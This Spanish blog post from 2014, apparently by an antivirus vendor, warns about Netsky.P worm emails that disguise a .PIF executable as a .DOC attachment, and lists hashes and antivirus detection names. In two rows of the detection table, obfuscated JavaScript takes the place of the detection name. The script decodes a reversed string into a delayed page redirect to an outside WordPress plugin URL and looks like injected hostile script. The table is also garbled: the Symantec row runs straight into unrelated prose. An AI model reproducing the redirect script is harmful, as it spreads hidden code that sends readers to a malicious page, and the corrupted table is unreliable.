SIGUEN LLEGANDO MAILS ANEXANDO NETSKY-P, EN FICHERO .DOC SIN APARENTE EXTENSION EJECUTABLE, AL UTILIZAR .PIF, QUE NO APARECEN NI MOSTRANDO EXTENSIONES

Estando ya controlado por el ELINETSA y por casi todos los antivirus, hacemos mencion de este mail (con remitente falseado, como es habitual en los NETSKY), debido a que vemos que el fichero anexado aparenta ser un .DOC, sin visualizar mas extensiones, (realmente es un PIF), lo que puede confundir al usuario y no pensar que se trata de un ejecutable infector

El preanalisis de virustotal ofrece este informe:
MD5 3018e99857f31a59e0777396ae634a8f
SHA1 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
Tamaño del fichero 28.9 KB ( 29568 bytes )
SHA256: c8fffb2e737514c551b2d7bcaf8baa459564b059cab1a35a3cec4b3c270d4525
Nombre: message_sat.doc …
Detecciones: 48 / 51
Fecha de análisis: 2014-04-08 07:43:42 UTC ( hace 0 minutos )

1 20

Antivirus  Resultado  Actualización
AVG  I-Worm/Netsky  20140407
Ad-Aware  Win32.Generic.497472  20140408
Agnitum  I-Worm.NetSky!4NWvXC1SwiU  20140407
AhnLab-V3  Win-Trojan/Fsg.29568  20140407
AntiVir  Worm/Netsky.AP  20140408
Antiy-AVL  Worm[Email]/Win32.NetSky  20140407
Avast  Win32:Netsky-AF [Wrm]  20140407
Baidu-International  Worm.Win32.NetSky.aMKE  20140408
BitDefender  Win32.Generic.497472  20140408
Bkav  W32.SkyNetP.Worm  20140407
CAT-QuickHeal  W32.NetSky.P  20140408
CMC  Generic.Win32.3018e99857!MD  20140408
ClamAV  Worm.NetSky-14  20140408
Commtouch  $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm  20140408
F-Secure  Win32.Generic.497472  20140408
Fortinet  $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM  20140408
McAfee-GW-Edition  Heuristic.BehavesLike.Win32.Suspicious-PKR.G  20140408
MicroWorld-eScan  Win32.Generic.497472  20140408
Microsoft  Worm:Win32/Netsky.P@mm  20140408
NANO-Antivirus  Trojan.Win32.NetSky.idzx  20140408
Norman  Netsky.P  20140408
Panda  W32/Netsky.AE.worm  20140407
Qihoo-360  Win32/Worm.d2e  20140408
Rising  PE:Trojan.Win32.Generic.129CEE65!312274533  20140406
SUPERAntiSpyware  Worm.Netsky-P  20140408
Sophos  W32/Netsky-P  20140408
Symantec  todas las direcciones disponibles en el ordenador, utilizando una de ellas como falso remitente, por lo que quien recibe las broncas no tiene ninguna culpa, mientras que el realmente infectado que está enviando los mails no se entera, si no tiene un antivirus residente, claro.

saludos

ms, 8-4-2014

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con
info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies